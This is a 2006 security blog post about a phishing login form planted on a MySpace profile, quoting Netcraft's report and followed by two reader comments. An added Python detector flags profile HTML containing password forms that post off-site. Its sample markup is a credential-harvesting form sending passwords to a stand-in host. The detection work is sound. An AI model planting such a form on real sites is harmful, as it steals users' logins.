Spyware Sucks
“There is no magic fairy dust protecting Macs” – Dai Zovi, author of “The Mac Hacker’s Handbook”

Myspace.com have some very basic problems…

October 28th 2006 in Uncategorized

http://news.netcraft.com/

"Netcraft has discovered that the social networking site, MySpace, appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form is designed to submit the victim's username and password to a remote server hosted in France.

Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting (XSS) or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form."

PCWorld have reported that the fraudulent site has been shut down, BUT how many users were affected before this occurred? So far there has been no word on how many users' accounts may have been compromised.

It remains to be seen why Myspace allowed a user account like "login_home_index_html" to be registered when they have a database of user names that are not permitted.

I block myspace.com whenever possible on networks in which I have a say about such things, because of incidents like the one featured today, because of one million PCs being infected via a banner ad, and because the myspace login is unencrypted.
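
As an added example (not code from this post, Netcraft or MySpace): a check a site could run on user-supplied profile markup to catch the pattern Netcraft describes, a password form whose action posts to a host other than the site's own. `SITE_HOSTS`, the function and class names and the sample markup are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the hosts the site itself serves login forms from.
SITE_HOSTS = {"myspace.com", "www.myspace.com"}
class PasswordFormFinder(HTMLParser):
    """Record the action of every <form> that contains a password input."""
    def __init__(self):
        super().__init__()
        self.actions = []    # actions of forms that hold a password field
        self._action = None  # action of the currently open form, if any
        self._has_pw = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._finish()   # an unclosed earlier form ends here
            self._action = (attrs.get("action") or "").strip()
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            if self._action is None:
                self._action = ""   # password field outside any <form>
            self._has_pw = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._finish()

    def _finish(self):
        if self._action is not None and self._has_pw:
            self.actions.append(self._action)
        self._action, self._has_pw = None, False

def review_profile_html(markup):
    """Return (action, posts_offsite) for each password form in user markup."""
    finder = PasswordFormFinder()
    finder.feed(markup)
    finder.close()
    finder._finish()         # flush a form left open at end of input
    findings = []
    for action in finder.actions:
        host = urlparse(action).hostname
        findings.append((action, bool(host) and host not in SITE_HOSTS))
    return findings

# Constructed sample of user-supplied profile markup (not from the incident).
SAMPLE_PROFILE = """
<form action="http://collector.example/save" method="post">
  <input type="text" name="email"><input type="password" name="password">
</form><form action="/search"><input type="text" name="q"></form>"""
```

Any finding at all is worth a moderator's attention, since user profile content has no reason to carry a password field; `posts_offsite` marks the cases where the credentials would leave the site.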


2 comments to...
“Myspace.com have some very basic problems…”

Nicholas

Check out my latest blog entry on MySpace, where I ramble about that very thing..

http://www.pdsys.org/blog/2006/10/25/MySpaceSucks.aspx



evas

danger danger danger spyware all over the place

